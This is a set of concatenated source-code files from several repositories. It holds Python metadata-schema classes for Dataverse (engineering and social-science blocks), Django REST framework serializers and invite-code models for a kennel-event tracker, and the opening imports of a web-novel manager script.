typeClass='primitive',
typeName='engMetaFlowsName',
)
components: Optional[str] = Field(
None,
description='List of system component names this flow belongs to.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsComp',
)
shape: Optional[str] = Field(
None,
description='Shape of the flow.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsShape',
)
size: Optional[float] = Field(
None,
description='Size of the flow.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsSize',
)
position: Optional[str] = Field(
None,
description='The position of the flow.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsPosition',
)
class ForceField(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the force field.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldName',
)
parameters: Optional[str] = Field(
None,
description='List of all parameter names relevant for this force field (detailed information about parameters should be given under Force Field Parameters entry).',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldPars',
)
class SpatialResolution(DataverseBase):
number_of_cells: Optional[int] = Field(
None,
description='The number of 2D spatial cells.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountCells',
)
number_of_blocks: Optional[int] = Field(
None,
description='The number of 3D spatial blocks.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountBlocks',
)
number_of_points_x: Optional[int] = Field(
None,
description='The number of points in x-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountX',
)
number_of_points_y: Optional[int] = Field(
None,
description='The number of points in y-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountY',
)
number_of_points_z: Optional[int] = Field(
None,
description='The number of points in z-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountZ',
)
interval_x: Optional[float] = Field(
None,
description='The distance between the points in x-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterIntervalX',
)
interval_y: Optional[float] = Field(
None,
description='The distance between the points in y-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterIntervalY',
)
interval_z: Optional[float] = Field(
None,
description='The distance between the points in z-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterIntervalZ',
)
unit: Optional[str] = Field(
None,
description='The unit of the grid.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterUnit',
)
scaling_formular: Optional[str] = Field(
None,
        description='If the grid is not equidistant, the distance between points can be specified via a formula.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterScalingFormular',
)
class BoundaryParameters(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParUnit',
)
value: Optional[float] = Field(
None,
description='The value of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParValue',
)
class SystemPhases(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of a phase.',
multiple=False,
typeClass='primitive',
typeName='engMetaPhaseName',
)
components: Optional[str] = Field(
None,
description='List of all component names for this phase (detailed information about components should be given under System Components).',
multiple=False,
typeClass='primitive',
typeName='engMetaPhaseComps',
)
class TemporalResolution(DataverseBase):
points: Optional[str] = Field(
None,
description='List of time points that describe the temporal resolution (if it can not be specified otherwise).',
multiple=False,
typeClass='primitive',
typeName='engMetaTempPoints',
)
number_of_time_steps: Optional[int] = Field(
None,
description='The number of time points (with equidistant distance).',
multiple=False,
typeClass='primitive',
typeName='engMetaTempCountPoints',
)
interval: Optional[float] = Field(
None,
description='Distance between two time points.',
multiple=False,
typeClass='primitive',
typeName='engMetaTempInterval',
)
unit: Optional[str] = Field(
None,
description='The unit of the temporal resolution.',
multiple=False,
typeClass='primitive',
typeName='engMetaTempUnit',
)
class BoundaryConditions(DataverseBase):
flows: Optional[str] = Field(
None,
description='List of in- and outflows describing this boundary condition (detailed information about flows should be given under Flows).',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondFlows',
)
parameters: Optional[str] = Field(
None,
description='List of all parameter names relevant for this boundary condition (detailed information about parameters should be given under Boundary Parameters.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondPars',
)
class EngMeta(DataverseBase):
system_parameters: List[SystemParameters] = Field(
default_factory=list,
description='Parameters of the observed system.',
multiple=True,
typeClass='compound',
typeName='engMetaSystemPar',
)
measured_variables: List[MeasuredVariables] = Field(
default_factory=list,
description='Specification of captured (measured / simulated / surveyed / dependent) variables.',
multiple=True,
typeClass='compound',
typeName='engMetaMeasuredVar',
)
system_or_phase_components: List[SystemOrPhaseComponents] = Field(
default_factory=list,
description='Specification of a component of the object of research / observed system',
multiple=True,
typeClass='compound',
typeName='engMetaComp',
)
controlled_variables: List[ControlledVariables] = Field(
default_factory=list,
description='Specification of controlled (observed / independent) variables.',
multiple=True,
typeClass='compound',
typeName='engMetaControlledVar',
)
force_field_parameters: List[ForceFieldParameters] = Field(
default_factory=list,
description='Specification of a force field parameter.',
multiple=True,
typeClass='compound',
typeName='engMetaForcefieldPar',
)
flows: List[Flows] = Field(
default_factory=list,
description='Information about in- and outflows relevant for boundary conditions.',
multiple=True,
typeClass='compound',
typeName='engMetaFlows',
)
force_field: List[ForceField] = Field(
default_factory=list,
description='Specification of a force field',
multiple=True,
typeClass='compound',
typeName='engMetaForcefield',
)
spatial_resolution: List[SpatialResolution] = Field(
default_factory=list,
description='Specification of the spatial grid of the observation.',
multiple=True,
typeClass='compound',
typeName='engMetaGitter',
)
boundary_parameters: List[BoundaryParameters] = Field(
default_factory=list,
description='Parameters relevant for boundary conditions.',
multiple=True,
typeClass='compound',
typeName='engMetaBoundCondPar',
)
system_phases: List[SystemPhases] = Field(
default_factory=list,
description='Phases of the observed system.',
multiple=True,
typeClass='compound',
typeName='engMetaPhase',
)
temporal_resolution: List[TemporalResolution] = Field(
default_factory=list,
description='Temporal resolution of the observation. Can be defined either through a number of time steps with a definition of the intervals (with unit) between the timesteps (equidistant time steps) or a series of time steps together with the unit.',
multiple=True,
typeClass='compound',
typeName='engMetaTemp',
)
data_generation: Optional[Union[List, DataGeneration]] = Field(
None,
description='Approach to data generation',
multiple=True,
typeClass='controlledVocabulary',
typeName='engMetaMode',
)
boundary_conditions: List[BoundaryConditions] = Field(
default_factory=list,
description='Definition of boundaries of the observed system.',
multiple=True,
typeClass='compound',
typeName='engMetaBoundCond',
)
_metadatablock_name: Optional[str] = 'engMeta'
def add_boundary_conditions(
self,
flows: Optional[str] = None,
parameters: Optional[str] = None,
):
"""Function used to add an instance of BoundaryConditions to the metadatablock.
Args:
flows (string): List of in- and outflows describing this boundary condition (detailed information about flows should be given under Flows).
parameters (string): List of all parameter names relevant for this boundary condition (detailed information about parameters should be given under Boundary Parameters.
"""
self.boundary_conditions.append(
BoundaryConditions(
flows=flows, parameters=parameters
)
)
def add_boundary_parameters(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
):
"""Function used to add an instance of BoundaryParameters to the metadatablock.
Args:
name (string): Name of the parameter.
symbol (string): The symbol used to describe this parameter.
unit (string): The unit or scale of this parameter.
value (number): The value of this parameter.
"""
self.boundary_parameters.append(
BoundaryParameters(
name=name, symbol=symbol, unit=unit, value=value
)
)
def add_controlled_variables(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
minimum_value: Optional[float] = None,
maximum_value: Optional[float] = None,
textual_value: Optional[str] = None,
):
"""Function used to add an instance of ControlledVariables to the metadatablock.
Args:
name (string): Name of this variable.
symbol (string): The symbol used to describe this variable.
unit (string): The unit or scale of this variable.
value (number): The (single) value of this variable.
minimum_value (number): The minimum value of this variable (use for ranges)
maximum_value (number): The maximum value of this variable (use for ranges)
textual_value (string): The value of this controlled variable (for non numerical values).
"""
self.controlled_variables.append(
ControlledVariables(
name=name, symbol=symbol, unit=unit, value=value, minimum_value=minimum_value, maximum_value=maximum_value, textual_value=textual_value
)
)
def add_flows(
self,
name: Optional[str] = None,
components: Optional[str] = None,
shape: Optional[str] = None,
size: Optional[float] = None,
position: Optional[str] = None,
):
"""Function used to add an instance of Flows to the metadatablock.
Args:
name (string): Name of the flow.
components (string): List of system component names this flow belongs to.
shape (string): Shape of the flow.
size (number): Size of the flow.
position (string): The position of the flow.
"""
self.flows.append(
Flows(
name=name, components=components, shape=shape, size=size, position=position
)
)
def add_force_field(
self,
name: Optional[str] = None,
parameters: Optional[str] = None,
):
"""Function used to add an instance of ForceField to the metadatablock.
Args:
name (string): Name of the force field.
parameters (string): List of all parameter names relevant for this force field (detailed information about parameters should be given under Force Field Parameters entry).
"""
self.force_field.append(
ForceField(
name=name, parameters=parameters
)
)
def add_force_field_parameters(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
):
"""Function used to add an instance of ForceFieldParameters to the metadatablock.
Args:
name (string): Name of the parameter.
symbol (string): The symbol used to describe this parameter.
unit (string): The unit or scale of this parameter.
value (number): The value of this parameter.
"""
self.force_field_parameters.append(
ForceFieldParameters(
name=name, symbol=symbol, unit=unit, value=value
)
)
def add_measured_variables(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
error: Optional[float] = None,
error_description: Optional[str] = None,
minimum_value: Optional[float] = None,
maximum_value: Optional[float] = None,
textual_value: Optional[str] = None,
):
"""Function used to add an instance of MeasuredVariables to the metadatablock.
Args:
name (string): Name of this variable.
symbol (string): The symbol used to describe this variable.
unit (string): The unit or scale of this variable.
error (number): A value for the uncertainty of this variable.
            error_description (string): The way in which the error is measured (e.g. standard deviation, percentage, …)
minimum_value (number): The minimum value of this variable (use for ranges)
maximum_value (number): The maximum value of this variable (use for ranges)
textual_value (string): The value of this measured variable (for non numerical values).
"""
self.measured_variables.append(
MeasuredVariables(
name=name, symbol=symbol, unit=unit, error=error, error_description=error_description, minimum_value=minimum_value, maximum_value=maximum_value, textual_value=textual_value
)
)
def add_spatial_resolution(
self,
number_of_cells: Optional[int] = None,
number_of_blocks: Optional[int] = None,
number_of_points_x: Optional[int] = None,
number_of_points_y: Optional[int] = None,
number_of_points_z: Optional[int] = None,
interval_x: Optional[float] = None,
interval_y: Optional[float] = None,
interval_z: Optional[float] = None,
unit: Optional[str] = None,
scaling_formular: Optional[str] = None,
):
"""Function used to add an instance of SpatialResolution to the metadatablock.
Args:
number_of_cells (integer): The number of 2D spatial cells.
number_of_blocks (integer): The number of 3D spatial blocks.
number_of_points_x (integer): The number of points in x-direction.
number_of_points_y (integer): The number of points in y-direction.
number_of_points_z (integer): The number of points in z-direction.
interval_x (number): The distance between the points in x-direction.
interval_y (number): The distance between the points in y-direction.
interval_z (number): The distance between the points in z-direction.
unit (string): The unit of the grid.
            scaling_formular (string): If the grid is not equidistant, the distance between points can be specified via a formula.
"""
self.spatial_resolution.append(
SpatialResolution(
number_of_cells=number_of_cells, number_of_blocks=number_of_blocks, number_of_points_x=number_of_points_x, number_of_points_y=number_of_points_y, number_of_points_z=number_of_points_z, interval_x=interval_x, interval_y=interval_y, interval_z=interval_z, unit=unit, scaling_formular=scaling_formular
)
)
def add_system_or_phase_components(
self,
id: Optional[int] = None,
name: Optional[str] = None,
description: Optional[str] = None,
inchicode: Optional[str] = None,
smilescode: Optional[str] = None,
iupac_name: Optional[str] = None,
quantity: Optional[str] = None,
unit: Optional[str] = None,
force_field: Optional[str] = None,
):
"""Function used to add an instance of SystemOrPhaseComponents to the metadatablock.
Args:
id (integer): Unique number that can be referred to in the metadata. Use if Name is not unique.
name (string): Name of this component.
description (string): Description of the component.
inchicode (string): The IUPAC International Chemical Identifier
smilescode (string): Simplified Molecular Input Line Entry Specification
iupac_name (string): Chemical nomenclature created and developed by the International Union of Pure and Applied Chemistry (IUPAC)
quantity (string): The amount of this component.
unit (string): The unit in which the amount is measured.
force_field (string): Name of the force field belonging to this component (detailed information about the force field should be given under Force Field Parameters).
"""
self.system_or_phase_components.append(
SystemOrPhaseComponents(
id=id, name=name, description=description, inchicode=inchicode, smilescode=smilescode, iupac_name=iupac_name, quantity=quantity, unit=unit, force_field=force_field
)
)
def add_system_parameters(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
textual_value: Optional[str] = None,
):
"""Function used to add an instance of SystemParameters to the metadatablock.
Args:
name (string): Name of the parameter.
symbol (string): The symbol used to describe this parameter.
unit (string): The unit or scale of this parameter.
value (number): The (numerical) value of this parameter.
textual_value (string): The value of this system parameter (for non numerical values).
"""
self.system_parameters.append(
SystemParameters(
name=name, symbol=symbol, unit=unit, value=value, textual_value=textual_value
)
)
def add_system_phases(
self,
name: Optional[str] = None,
components: Optional[str] = None,
):
"""Function used to add an instance of SystemPhases to the metadatablock.
Args:
name (string): Name of a phase.
components (string): List of all component names for this phase (detailed information about components should be given under System Components).
"""
self.system_phases.append(
SystemPhases(
name=name, components=components
)
)
def add_temporal_resolution(
self,
points: Optional[str] = None,
number_of_time_steps: Optional[int] = None,
interval: Optional[float] = None,
unit: Optional[str] = None,
):
"""Function used to add an instance of TemporalResolution to the metadatablock.
Args:
points (string): List of time points that describe the temporal resolution (if it can not be specified otherwise).
number_of_time_steps (integer): The number of time points (with equidistant distance).
interval (number): Distance between two time points.
unit (string): The unit of the temporal resolution.
"""
self.temporal_resolution.append(
TemporalResolution(
points=points, number_of_time_steps=number_of_time_steps, interval=interval, unit=unit
)
)
```
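A brief usage sketch for the metadatablock above. The excerpt does not show the name of the enclosing class, so `EngMeta` below is a hypothetical placeholder for whichever class carries these fields; only the `add_*` signatures shown above are relied on, and all values are invented.
```python
# `EngMeta` is a placeholder name for the metadatablock class defined above
block = EngMeta()
# a controlled (independent) variable of the observation
block.add_controlled_variables(name='Temperature', symbol='T', unit='K', value=293.15)
# equidistant temporal resolution: 1000 steps of 0.5 s
block.add_temporal_resolution(number_of_time_steps=1000, interval=0.5, unit='s')
# a flow and the boundary condition that references it by name
block.add_flows(name='inlet', shape='circular', size=0.01, position='x=0')
block.add_boundary_conditions(flows='inlet', parameters='inlet velocity')
```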
#### File: pyDaRUS/metadatablocks/socialscience.py
```python
from __future__ import annotations
from typing import List, Optional
from easyDataverse.core import DataverseBase
from pydantic import Field
class Notes(DataverseBase):
type: Optional[str] = Field(
None,
description='Type of note.',
multiple=False,
typeClass='primitive',
typeName='socialScienceNotesType',
)
subject: Optional[str] = Field(
None,
description='Note subject.',
multiple=False,
typeClass='primitive',
typeName='socialScienceNotesSubject',
)
text: Optional[str] = Field(
None,
description='Text for this note.',
multiple=False,
typeClass='primitive',
typeName='socialScienceNotesText',
)
class TargetSampleSize(DataverseBase):
actual: Optional[int] = Field(
None,
description='Actual sample size.',
multiple=False,
typeClass='primitive',
typeName='targetSampleActualSize',
)
formula: Optional[str] = Field(
None,
description='Formula used to determine target sample size.',
multiple=False,
typeClass='primitive',
typeName='targetSampleSizeFormula',
)
class Socialscience(DataverseBase):
notes: List[Notes] = Field(
default_factory=list,
description='General notes about this Dataset.',
multiple=False,
typeClass='compound',
typeName='socialScienceNotes',
)
unit_of_analysis: Optional[List] = Field(
None,
description="Basic unit of analysis or observation that this Dataset describes, such as individuals, families/households, groups, institutions/organizations, administrative units, and more. For information about the DDI's controlled vocabulary for this element, please refer to the DDI web page at http://www.ddialliance.org/controlled-vocabularies.",
multiple=True,
typeClass='primitive',
typeName='unitOfAnalysis',
)
universe: Optional[List] = Field(
None,
description='Description of the population covered by the data in the file; the group of people or other elements that are the object of the study and to which the study results refer. Age, nationality, and residence commonly help to delineate a given universe, but any number of other factors may be used, such as age limits, sex, marital status, race, ethnic group, nationality, income, veteran status, criminal convictions, and more. The universe may consist of elements other than persons, such as housing units, court cases, deaths, countries, and so on. In general, it should be possible to tell from the description of the universe whether a given individual or element is a member of the population under study. Also known as the universe of interest, population of interest, and target population.',
multiple=True,
typeClass='primitive',
typeName='universe',
)
time_method: Optional[str] = Field(
None,
        description='The time method or time dimension of the data collection, such as panel, cross-sectional, trend, time-series, or other.',
multiple=False,
typeClass='primitive',
typeName='timeMethod',
)
data_collector: Optional[str] = Field(
None,
description='Individual, agency or organization responsible for administering the questionnaire or interview or compiling the data.',
multiple=False,
typeClass='primitive',
typeName='dataCollector',
)
collector_training: Optional[str] = Field(
None,
description='Type of training provided to the data collector',
multiple=False,
typeClass='primitive',
typeName='collectorTraining',
)
frequency: Optional[str] = Field(
None,
description='If the data collected includes more than one point in time, indicate the frequency with which the data was collected; that is, monthly, quarterly, or other.',
multiple=False,
typeClass='primitive',
typeName='frequencyOfDataCollection',
)
sampling_procedure: Optional[str] = Field(
None,
description='Type of sample and sample design used to select the survey respondents to represent the population. May include reference to the target sample size and the sampling fraction.',
multiple=False,
typeClass='primitive',
typeName='samplingProcedure',
)
major_deviations_for_sample_design: Optional[str] = Field(
None,
description='Show correspondence as well as discrepancies between the sampled units (obtained) and available statistics for the population (age, sex-ratio, marital status, etc.) as a whole.',
multiple=False,
typeClass='primitive',
typeName='deviationsFromSampleDesign',
)
collection_mode: Optional[List] = Field(
None,
description='Method used to collect the data; instrumentation characteristics (e.g., telephone interview, mail questionnaire, or other).',
multiple=True,
typeClass='primitive',
typeName='collectionMode',
)
type_of_research_instrument: Optional[str] = Field(
None,
description='Type of data collection instrument used. Structured indicates an instrument in which all respondents are asked the same questions/tests, possibly with precoded answers. If a small portion of such a questionnaire includes open-ended questions, provide appropriate comments. Semi-structured indicates that the research instrument contains mainly open-ended questions. Unstructured indicates that in-depth interviews were conducted.',
multiple=False,
typeClass='primitive',
typeName='researchInstrument',
)
characteristics_of_data_collection_situation: Optional[str] = Field(
None,
description='Description of noteworthy aspects of the data collection situation. Includes information on factors such as cooperativeness of respondents, duration of interviews, number of call backs, or similar.',
multiple=False,
typeClass='primitive',
typeName='dataCollectionSituation',
)
actions_to_minimize_losses: Optional[str] = Field(
None,
description='Summary of actions taken to minimize data loss. Include information on actions such as follow-up visits, supervisory checks, historical matching, estimation, and so on.',
multiple=False,
typeClass='primitive',
typeName='actionsToMinimizeLoss',
)
control_operations: Optional[str] = Field(
None,
        description='Methods to facilitate data control performed by the primary investigator or by the data archive.',
multiple=False,
typeClass='primitive',
typeName='controlOperations',
)
weighting: Optional[str] = Field(
None,
description='The use of sampling procedures might make it necessary to apply weights to produce accurate statistical results. Describes the criteria for using weights in analysis of a collection. If a weighting formula or coefficient was developed, the formula is provided, its elements are defined, and it is indicated how the formula was applied to the data.',
multiple=False,
typeClass='primitive',
typeName='weighting',
)
cleaning_operations: Optional[str] = Field(
None,
description='Methods used to clean the data collection, such as consistency checking, wildcode checking, or other.',
multiple=False,
typeClass='primitive',
typeName='cleaningOperations',
)
study_level_error_notes: Optional[str] = Field(
None,
description='Note element used for any information annotating or clarifying the methodology and processing of the study. ',
multiple=False,
typeClass='primitive',
typeName='datasetLevelErrorNotes',
)
response_rate: Optional[str] = Field(
None,
description='Percentage of sample members who provided information.',
multiple=False,
typeClass='primitive',
typeName='responseRate',
)
estimates_of_sampling_error: Optional[str] = Field(
None,
description='Measure of how precisely one can estimate a population value from a given sample.',
multiple=False,
typeClass='primitive',
typeName='samplingErrorEstimates',
)
other_forms_of_data_appraisal: Optional[str] = Field(
None,
description='Other issues pertaining to the data appraisal. Describe issues such as response variance, nonresponse rate and testing for bias, interviewer and response bias, confidence levels, question bias, or similar.',
multiple=False,
typeClass='primitive',
typeName='otherDataAppraisal',
)
target_sample_size: List[TargetSampleSize] = Field(
default_factory=list,
description='Specific information regarding the target sample size, actual sample size, and the formula used to determine this.',
multiple=False,
typeClass='compound',
typeName='targetSampleSize',
)
_metadatablock_name: Optional[str] = 'socialscience'
def add_notes(
self,
type: Optional[str] = None,
subject: Optional[str] = None,
text: Optional[str] = None,
):
"""Function used to add an instance of Notes to the metadatablock.
Args:
type (string): Type of note.
subject (string): Note subject.
text (string): Text for this note.
"""
self.notes.append(
Notes(
type=type, subject=subject, text=text
)
)
def add_target_sample_size(
self,
actual: Optional[int] = None,
formula: Optional[str] = None,
):
"""Function used to add an instance of TargetSampleSize to the metadatablock.
Args:
actual (integer): Actual sample size.
formula (string): Formula used to determine target sample size.
"""
self.target_sample_size.append(
TargetSampleSize(
actual=actual, formula=formula
)
)
``` |
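A short usage sketch for the `Socialscience` block defined above; the field values are invented and only the fields and helpers shown here are used.
```python
# illustrative values only
block = Socialscience(time_method='panel', response_rate='72%')
# compound entries go through the add_* helpers
block.add_notes(type='methodology', subject='weighting', text='Post-stratification weights applied.')
block.add_target_sample_size(actual=1200, formula='n = z^2 * p * (1 - p) / e^2')
```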
{
"source": "jR1P621/packtrack",
"score": 3
} |
#### File: api/serializers/common.py
```python
from rest_framework import serializers
from typing import List
class NestedDynamicFieldsModelSerializer(serializers.ModelSerializer):
'''
Allows dynamic control over the depth and information presented in nested serializers.
'''
def __init__(self, *args, **kwargs):
def parse_nested_fields(fields: List[str]) -> dict:
'''
            Parses the `fields` parameter into a nested mapping of the fields requested at each serializer level.
'''
field_object = {"fields": []}
for f in fields:
obj = field_object
# get nested serializer fields
nested_fields = f.split("__")
for v in nested_fields:
# add this objects field
if v not in obj["fields"]:
obj["fields"].append(v)
# add nested object's field
if nested_fields.index(v) < len(nested_fields) - 1:
obj[v] = obj.get(v, {"fields": []})
obj = obj[v]
return field_object
def select_nested_fields(serializer, fields):
'''
Wrapper to retrieve data from serializer fields or nested serializer fields
'''
for k in fields:
if k == "fields":
fields_to_include(serializer, fields[k])
else:
select_nested_fields(serializer.fields[k], fields[k])
def fields_to_include(serializer, fields):
'''
Drop any fields that are not specified in the `fields` argument.
'''
allowed = set(fields)
if isinstance(serializer, serializers.ListSerializer):
existing = set(serializer.child.fields.keys())
for field_name in existing - allowed:
serializer.child.fields.pop(field_name)
else:
existing = set(serializer.fields.keys())
for field_name in existing - allowed:
serializer.fields.pop(field_name)
# Don't pass the `fields` arg up to the superclass
fields = kwargs.pop('fields', None)
super().__init__(*args, **kwargs)
if fields is not None:
fields = parse_nested_fields(fields)
# Drop any fields that are not specified in the `fields` argument.
select_nested_fields(self, fields)
```
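A usage sketch for the `fields` syntax parsed above: double underscores descend into nested serializers, and anything not listed is dropped. The serializers and models below are hypothetical stand-ins for illustration.
```python
# hypothetical serializers; a nested path requires `host` to itself be a serializer field
class HostSerializer(NestedDynamicFieldsModelSerializer):
    class Meta:
        model = Kennel         # hypothetical model
        fields = '__all__'
class ExampleEventSerializer(NestedDynamicFieldsModelSerializer):
    host = HostSerializer(read_only=True)
    class Meta:
        model = Event          # hypothetical model
        fields = '__all__'
# 'host__name' parses to {"fields": ["name", "host"], "host": {"fields": ["name", "acronym"]}},
# so only `name` plus the host's `name` and `acronym` survive serialization
serializer = ExampleEventSerializer(
    Event.objects.all(), many=True,
    fields=['name', 'host__name', 'host__acronym'])
```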
#### File: packtrack/core/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save, pre_delete
from django.dispatch import receiver
import datetime
from . import settings
def default_invite_expiration():
return datetime.date.today() + datetime.timedelta(
days=settings.DEFAULT_INVITE_EXPIRATION_DAYS)
class InviteCode(models.Model):
'''
An invite code needed for new users to register.
'''
creator = models.ForeignKey(User, on_delete=models.CASCADE)
code = models.CharField(max_length=8, unique=True)
expiration = models.DateField(null=True, blank=True)
receiver = models.OneToOneField(User,
on_delete=models.CASCADE,
null=True,
blank=True,
related_name='invite_code')
@receiver(post_save, sender=InviteCode)
def set_expiration(sender, instance, created, **kwargs) -> None:
'''
Sets the expiration date for newly created InviteCodes.
Removes expiration for used codes
'''
if created:
instance.expiration = default_invite_expiration()
elif instance.receiver and instance.expiration is not None:
instance.expiration = None
else:
return
instance.save()
```
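A sketch of the signal behaviour above, assuming a working Django setup; `creator_user` and `new_user` are placeholder `User` instances.
```python
# creating a code stamps an expiration DEFAULT_INVITE_EXPIRATION_DAYS in the future
code = InviteCode.objects.create(creator=creator_user, code='AB12CD34')
assert code.expiration == default_invite_expiration()
# once the code is claimed by a registered user, the expiration is cleared
code.receiver = new_user
code.save()
assert code.expiration is None
```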
#### File: events/api/serializers.py
```python
from django.db.utils import IntegrityError
from rest_framework import serializers, exceptions
from django.utils.translation import gettext_lazy as _
from .. import models
from core.api.serializers.serializers import UserSerializer
from core.api.serializers.common import NestedDynamicFieldsModelSerializer
from kennels.api.serializers import KennelSerializer
class EventSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
    '''
    Read serializer for Event with nested host and kennel info plus per-event attendance.
    '''
    host = KennelSerializer(fields=['url', 'name', 'acronym'], read_only=True)
kennels = KennelSerializer(fields=['url', 'name', 'acronym'],
many=True,
read_only=True)
attendance = serializers.SerializerMethodField()
class Meta:
model = models.Event
fields = ['url', 'id', 'name', 'date', 'host', 'attendance', 'kennels']
read_only_fields = [
'url', 'id', 'date', 'host', 'attendance', 'kennels'
]
def get_attendance(self, instance):
        # serialize every attendance record for this event, ordered by user
return AttendSerializer(instance.attendance.order_by('user'),
fields=[
'url', 'is_hare', 'unclaimed_name',
'user__url', 'user__username',
'user__profile__hash_name'
],
many=True,
context=self.context).data
class EventCreateSerializer(serializers.HyperlinkedModelSerializer):
'''
Serializer for Event creation.
Provides proper fields and kennel-level permissions
'''
date = serializers.DateField()
class Meta:
model = models.Event
fields = ['name', 'date', 'host']
def create(self, validated_data):
if self.context['request'].user in validated_data[
'host'].get_kennel_admins():
return super().create(validated_data)
raise exceptions.PermissionDenied
class LongevitySerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
kennel = KennelSerializer(fields=['url', 'name', 'acronym'])
event = EventSerializer(
fields=['url', 'name', 'host__url', 'host__name', 'host__acronym'])
class Meta:
model = models.Longevity
fields = ['url', 'kennel', 'event']
read_only_fields = ['url', 'kennel', 'event']
class AttendSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
user = UserSerializer(fields=['url', 'username', 'profile__hash_name'],
read_only=True)
longevity_records = serializers.SerializerMethodField()
event = EventSerializer(fields=[
'url', 'id', 'name', 'date', 'host__url', 'host__name', 'host__acronym'
])
claimants = serializers.SerializerMethodField()
class Meta:
model = models.Attend
fields = [
'url', 'event', 'user', 'unclaimed_name', 'is_hare',
'longevity_records', 'claimants'
]
read_only_fields = [
'event', 'user', 'unclaimed_name', 'is_hare', 'longevity_records',
'claimants'
]
def get_longevity_records(self, instance):
return LongevityRecordSerializer(instance=instance.longevity_records,
context=self.context,
fields=[
'url', 'longevity',
'longevity__kennel__url',
'longevity__kennel__name',
'longevity__kennel__acronym'
],
many=True).data
def get_claimants(self, instance):
return UserSerializer(instance=instance.claimants,
context=self.context,
fields=[
'url',
'username',
'profile__hash_name',
],
many=True).data
class AttendCreateSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
'''
Serializer for Attend creation.
Provides proper fields and kennel-level permissions
'''
class Meta:
model = models.Attend
fields = ['url', 'event', 'user', 'unclaimed_name', 'is_hare']
def create(self, validated_data):
if self.context['request'].user in validated_data[
'event'].host.get_kennel_admins():
return super().create(validated_data)
raise exceptions.PermissionDenied
class AttendModifyClaimedSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
'''
Serializer for claimed Attend modification.
Restricts writable fields
'''
class Meta:
model = models.Attend
fields = ['url', 'event', 'user', 'is_hare']
read_only_fields = ['event', 'user']
class AttendModifyUnclaimedSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
'''
    Serializer for unclaimed Attend modification.
'''
class Meta:
model = models.Attend
fields = ['url', 'event', 'user', 'unclaimed_name', 'is_hare']
read_only_fields = ['event']
class LongevityRecordSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
longevity = LongevitySerializer(fields=[
'event__url', 'event__name', 'event__host__url', 'event__host__name',
'event__host__acronym', 'kennel__url', 'kennel__name',
'kennel__acronym'
],
read_only=True)
attend = AttendSerializer(fields=[
'user__url', 'user__username', 'user__profile__hash_name',
'unclaimed_name'
],
read_only=True)
class Meta:
model = models.LongevityRecord
fields = ['url', 'longevity', 'is_longevity', 'attend']
class AttendClaimSerializer(serializers.HyperlinkedModelSerializer):
attend = AttendSerializer(fields=[
'url', 'event__url', 'event__name', 'event__date', 'event__host__url',
'event__host__name', 'event__host__acronym', 'unclaimed_name'
])
class Meta:
model = models.AttendClaim
fields = ['url', 'attend', 'claimant']
read_only_fields = ['claimant']
class AttendClaimCreateSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = models.AttendClaim
fields = ['attend', 'claimant']
read_only_fields = ['claimant']
def create(self, validated_data):
# if the attend is already claimed
if validated_data['attend'].user:
raise IntegrityError
# if the claimant already has an attend for this event
if models.Attend.objects.filter(
user=self.context['request'].user,
event=validated_data['attend'].event).count() > 0:
raise IntegrityError
return super().create(validated_data)
``` |
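The create serializers above check permissions through `self.context['request'].user`, so a view has to pass the request in the serializer context. A hedged sketch of that pattern; `request` and `event_url` are placeholders supplied by the calling view.
```python
# inside a DRF view; `request` and `event_url` are placeholders
serializer = AttendCreateSerializer(
    data={'event': event_url, 'unclaimed_name': 'Just Jane', 'is_hare': False},
    context={'request': request})
serializer.is_valid(raise_exception=True)
# create() raises PermissionDenied unless request.user administers the host kennel
serializer.save()
```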
{
"source": "jr2nbv/webnovel-manager",
"score": 2
} |
#### File: jr2nbv/webnovel-manager/webnovel.py
```python
import sys
import re
import json
import requests
import os
import io
import pprint # for debug
import hashlib
from enum import Enum
from bs4 import BeautifulSoup, NavigableString, Tag
import xml.sax.saxutils
